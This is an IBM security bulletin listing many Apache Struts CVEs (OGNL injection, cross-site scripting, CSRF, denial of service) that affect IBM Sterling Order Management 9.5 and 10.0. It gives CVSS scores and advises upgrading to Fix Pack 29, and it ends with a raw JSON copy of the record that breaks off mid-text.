Security Bulletin: IBM Sterling Order Management Apache Struts upgrade strategy (various CVEs, see below)

2022-09-14T17:45:15

Description

## Summary Apache Struts is used by IBM Sterling Order Management as part of its web application framework used for creating Java EE web applications . We recommend upgrading to the latest supported version of Struts that was released as part of the latest FixPack 29. ## Vulnerability Details ** CVEID: **[CVE-2011-1772](<https://vulners.com/cve/CVE-2011-1772>) ** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by Xwork when generating the action name for error pages. If Dynamic Method Invocation is enabled, a remote attacker could exploit this vulnerability using the tag in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. CVSS Base score: 2.6 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/67354](<https://exchange.xforce.ibmcloud.com/vulnerabilities/67354>) for the current score. CVSS Vector: (AV:N/AC:H/Au:N/C:N/I:P/A:N) ** CVEID: **[CVE-2012-0838](<https://vulners.com/cve/CVE-2012-0838>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the evaluation of an OGNL expression during a conversion error. An attacker could exploit this vulnerability using invalid input to a field to modify run-time data and execute arbitrary code on the system. CVSS Base score: 7.5 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/73690](<https://exchange.xforce.ibmcloud.com/vulnerabilities/73690>) for the current score. CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) ** CVEID: **[CVE-2014-7809](<https://vulners.com/cve/CVE-2014-7809>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by predictable tokens. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass cross-site request forgery security measures. CVSS Base score: 4.3 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/98963](<https://exchange.xforce.ibmcloud.com/vulnerabilities/98963>) for the current score. CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) ** CVEID: **[CVE-2011-5057](<https://vulners.com/cve/CVE-2011-5057>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to block access to the session map by the org.apache.struts2.interceptor.SessionAware or org.apache.struts2.interceptor.RequestAware interfaces. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to modify the session map. CVSS Base score: 5 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/71654](<https://exchange.xforce.ibmcloud.com/vulnerabilities/71654>) for the current score. CVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) ** CVEID: **[CVE-2012-4387](<https://vulners.com/cve/CVE-2012-4387>) ** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an error when handling request parameters. A remote attacker could exploit this vulnerability using a specially-crafted parameter name containing an OGNL expression to consume all available CPU resources. CVSS Base score: 5 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78183>) for the current score. CVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) ** CVEID: **[CVE-2012-1006](<https://vulners.com/cve/CVE-2012-1006>) ** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the editPerson.action and struts2-rest-showcase/orders scripts. A remote attacker could exploit this vulnerability using the name, lastName or clientNape parameter in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. CVSS Base score: 4.3 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72888](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72888>) for the current score. CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) ** CVEID: **[CVE-2012-0392](<https://vulners.com/cve/CVE-2012-0392>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the failure to properly restrict access to static methods by the CookieInterceptor class. An attacker could exploit this vulnerability to execute arbitrary commands on the system. CVSS Base score: 7.5 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72088](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72088>) for the current score. CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) ** CVEID: **[CVE-2014-0094](<https://vulners.com/cve/CVE-2014-0094>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server. CVSS Base score: 5 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92205](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92205>) for the current score. CVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) ** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) ** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. CVSS Base score: 5.9 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) ** CVEID: **[CVE-2013-1965](<https://vulners.com/cve/CVE-2013-1965>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error in the Apache Struts Showcase App. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary code on the system. CVSS Base score: 6.8 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85573](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85573>) for the current score. CVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P) ** CVEID: **[CVE-2014-0112](<https://vulners.com/cve/CVE-2014-0112>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. CVSS Base score: 7.5 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92740](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92740>) for the current score. CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) ** CVEID: **[CVE-2013-2134](<https://vulners.com/cve/CVE-2013-2134>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. CVSS Base score: 7.5 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84762](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84762>) for the current score. CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) ** CVEID: **[CVE-2016-3081](<https://vulners.com/cve/CVE-2016-3081>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability to execute arbitrary code on the system. CVSS Base score: 5.6 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112528](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112528>) for the current score. CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L) ** CVEID: **[CVE-2014-0113](<https://vulners.com/cve/CVE-2014-0113>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to CookieInterceptor and the failure to restrict access to the getClass() method. An attacker could exploit this vulnerability using CookieInterceptor when configured to accept all cookies to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. CVSS Base score: 7.5 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92742](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92742>) for the current score. CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) ** CVEID: **[CVE-2013-2135](<https://vulners.com/cve/CVE-2013-2135>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. CVSS Base score: 7.5 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84763](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84763>) for the current score. CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) ** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. CVSS Base score: 7.3 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) ** CVEID: **[CVE-2013-4316](<https://vulners.com/cve/CVE-2013-4316>) ** DESCRIPTION: **An unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution. CVSS Base score: 10 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87373](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87373>) for the current score. CVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) ** CVEID: **[CVE-2012-0391](<https://vulners.com/cve/CVE-2012-0391>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the interpretation of parameter values as OGNL expressions by the ExceptionDelegator command. An attacker could exploit this vulnerability using a specially-crafted parameter to execute arbitrary commands on the system. CVSS Base score: 7.5 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72229](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72229>) for the current score. CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) ** CVEID: **[CVE-2012-0393](<https://vulners.com/cve/CVE-2012-0393>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to traverse directories on the system, caused by the improper validation of input by ParameterInterceptor prior to being used to create files. An attacker could send a specially-crafted URL request containing directory traversal sequences to create or overwrite arbitrary files on the system. CVSS Base score: 5 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72089](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72089>) for the current score. CVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) ** CVEID: **[CVE-2012-4386](<https://vulners.com/cve/CVE-2012-4386>) ** DESCRIPTION: **Apache Struts is vulnerable to cross-site request forgery, caused by improper validation of the token name configuration parameter by the token handling mechanism. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to perform unauthorized actions. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities. CVSS Base score: 4.3 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78182](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78182>) for the current score. CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) ** CVEID: **[CVE-2016-4003](<https://vulners.com/cve/CVE-2016-4003>) ** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. CVSS Base score: 6.1 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/111514](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111514>) for the current score. CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) ** CVEID: **[CVE-2016-3093](<https://vulners.com/cve/CVE-2016-3093>) ** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by the improper implementation of cache used to store method references by the OGNL expression language. An attacker could exploit this vulnerability to block access to a Web site. CVSS Base score: 5.3 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/113686](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score. CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) ** CVEID: **[CVE-2013-4310](<https://vulners.com/cve/CVE-2013-4310>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the action: parameter prefix. An attacker could exploit this vulnerability to gain unauthorized access to the system. CVSS Base score: 5.8 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87336](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87336>) for the current score. CVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) ** CVEID: **[CVE-2014-0116](<https://vulners.com/cve/CVE-2014-0116>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to properly restrict access to the getClass() method by the CookieInterceptor class. An attacker could exploit this vulnerability to manipulate the ClassLoader used by the application server. CVSS Base score: 4.3 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/93024](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93024>) for the current score. CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) ** CVEID: **[CVE-2010-1870](<https://vulners.com/cve/CVE-2010-1870>) ** DESCRIPTION: **XWork, as used in Apache Struts, FishEye and Crucible, could allow a remote attacker to bypass security restrictions, caused by an error in the ParameterInterceptor class. An attacker could exploit this vulnerability using specially-crafted OGNL (Object-Graph Navigation Language) expressions to modify server-side objects and possibly execute arbitrary commands on the system. CVSS Base score: 7.5 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/60371](<https://exchange.xforce.ibmcloud.com/vulnerabilities/60371>) for the current score. CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) ** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. CVSS Base score: 8.1 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) ** CVEID: **[CVE-2016-3082](<https://vulners.com/cve/CVE-2016-3082>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of XSLTResult to parse arbitrary stylesheet. An attacker could exploit this vulnerability to inject and execute arbitrary code on the system. CVSS Base score: 7.3 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112527](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112527>) for the current score. CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) ** CVEID: **[CVE-2016-4436](<https://vulners.com/cve/CVE-2016-4436>) ** DESCRIPTION: **An unspecified error Apache Struts related to the method used to clean up action name has an unknown impact and attack vector. CVSS Base score: 5.3 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/114183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114183>) for the current score. CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) ** CVEID: **[CVE-2013-2251](<https://vulners.com/cve/CVE-2013-2251>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating the action:, redirect:, and redirectAction: parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary commands on the system. Note: This vulnerability affects other products. CVSS Base score: 7.5 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85756](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85756>) for the current score. CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) ** CVEID: **[CVE-2017-12611](<https://vulners.com/cve/CVE-2017-12611>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of an unintentional expression in Freemarker tag instead of string literals. An attacker could exploit this vulnerability to execute arbitrary code on the system. CVSS Base score: 7.3 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/131603](<https://exchange.xforce.ibmcloud.com/vulnerabilities/131603>) for the current score. CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) ** CVEID: **[CVE-2015-5209](<https://vulners.com/cve/CVE-2015-5209>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to gain unauthorized access to the system. An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user session. CVSS Base score: 9.1 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106695](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score. CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) ** CVEID: **[CVE-2013-2115](<https://vulners.com/cve/CVE-2013-2115>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an incomplete fix for an error related to the handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. CVSS Base score: 7.5 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84543>) for the current score. CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) ** CVEID: **[CVE-2013-1966](<https://vulners.com/cve/CVE-2013-1966>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restriction, caused by the improper handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject OGNL code on the system. CVSS Base score: 7.5 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84542](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84542>) for the current score. CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) ** CVEID: **[CVE-2013-2248](<https://vulners.com/cve/CVE-2013-2248>) ** DESCRIPTION: **Apache Struts could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability in the DefaultActionMapper class. An attacker could exploit this vulnerability using the redirect: and redirectAction:: parameters in a specially-crafted URL to redirect a victim to arbitrary Web sites. CVSS Base score: 4.3 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85755](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85755>) for the current score. CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) ** CVEID: **[CVE-2015-2992](<https://vulners.com/cve/CVE-2015-2992>) ** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when directly accessing JSP files. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. CVSS Base score: 6.1 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106172](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106172>) for the current score. CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) ** CVEID: **[CVE-2015-5169](<https://vulners.com/cve/CVE-2015-5169>) ** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when debug mode is enabled. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. CVSS Base score: 6.1 CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/105879](<https://exchange.xforce.ibmcloud.com/vulnerabilities/105879>) for the current score. CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) ## Affected Products and Versions Affected Product(s)| Version(s) ---|--- IBM Sterling Order Management| 10.0 IBM Sterling Order Management| 9.5.x ## Remediation/Fixes IBM strongly recommends addressing the vulnerability now by upgrading to the latest fixpack that has the upgraded version of Apache Struts. Please note the fixpack only applies to IBM Sterling Order Management version 10 and if you are running IBM Sterling Order Management version 9.5 a product upgrade must be completed first. IBM Sterling Order Management version 9.5 end of support April 30, 2022. Order Management installing Fix Pack29 -[https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp29 https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp30](<https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp29>) Fix Pack 29 download location - [https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-SSFF-All-fp30-Installer&product=ibm%2FOther%20software%2FSterling%20Selling%20and%20Fulfillment%20Foundation&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling-SSFF-All-fp30-Installer%20&function=fixId&parent=ibm/Other%20software](<https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-SSFF-All-fp30-Installer&product=ibm%2FOther%20software%2FSterling%20Selling%20and%20Fulfillment%20Foundation&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling-SSFF-All-fp30-Installer%20&function=fixId&parent=ibm/Other%20software>) Creating & Extending Struts - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=cesf-creating-extending-struts-xml-file-in-web-ui-framework> On-Premise release notes - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version> Fix Central Link (**FP details URL)**: [http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR>) ## Workarounds and Mitigations IBM strongly recommends addressing the vulnerability now by executing above steps in product version 10.0. Version 9.5 is end of support as of April 30, 2022. If you need further clarifications regarding 9.5 end of support, log4j and version 9.5 please contact IBM support. ##

Affected Software

CPE Name	Name	Version
	sterling selling and fulfillment suite	9.5
	sterling selling and fulfillment suite	10.

{"id": "87B4000A01C23B6231C463A8E1B3BEC371361C202F46354684899DC113F12BC8", "vendorId": null, "type": "ibm", "bulletinFamily": "software", "title": "Security Bulletin: IBM Sterling Order Management Apache Struts upgrade strategy (various CVEs, see below)", "description": "## Summary\n\nApache Struts is used by IBM Sterling Order Management as part of its web application framework used for creating Java EE web applications . We recommend upgrading to the latest supported version of Struts that was released as part of the latest FixPack 29.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2011-1772](<https://vulners.com/cve/CVE-2011-1772>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by Xwork when generating the action name for error pages. If Dynamic Method Invocation is enabled, a remote attacker could exploit this vulnerability using the tag in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/67354](<https://exchange.xforce.ibmcloud.com/vulnerabilities/67354>) for the current score. \nCVSS Vector: (AV:N/AC:H/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-0838](<https://vulners.com/cve/CVE-2012-0838>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the evaluation of an OGNL expression during a conversion error. An attacker could exploit this vulnerability using invalid input to a field to modify run-time data and execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/73690](<https://exchange.xforce.ibmcloud.com/vulnerabilities/73690>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-7809](<https://vulners.com/cve/CVE-2014-7809>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by predictable tokens. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass cross-site request forgery security measures. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/98963](<https://exchange.xforce.ibmcloud.com/vulnerabilities/98963>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2011-5057](<https://vulners.com/cve/CVE-2011-5057>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to block access to the session map by the org.apache.struts2.interceptor.SessionAware or org.apache.struts2.interceptor.RequestAware interfaces. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to modify the session map. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/71654](<https://exchange.xforce.ibmcloud.com/vulnerabilities/71654>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-4387](<https://vulners.com/cve/CVE-2012-4387>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an error when handling request parameters. A remote attacker could exploit this vulnerability using a specially-crafted parameter name containing an OGNL expression to consume all available CPU resources. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78183>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n \n** CVEID: **[CVE-2012-1006](<https://vulners.com/cve/CVE-2012-1006>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the editPerson.action and struts2-rest-showcase/orders scripts. A remote attacker could exploit this vulnerability using the name, lastName or clientNape parameter in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72888](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72888>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-0392](<https://vulners.com/cve/CVE-2012-0392>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the failure to properly restrict access to static methods by the CookieInterceptor class. An attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72088](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72088>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-0094](<https://vulners.com/cve/CVE-2014-0094>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92205](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92205>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2013-1965](<https://vulners.com/cve/CVE-2013-1965>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error in the Apache Struts Showcase App. An attacker could exploit this vulnerability using a 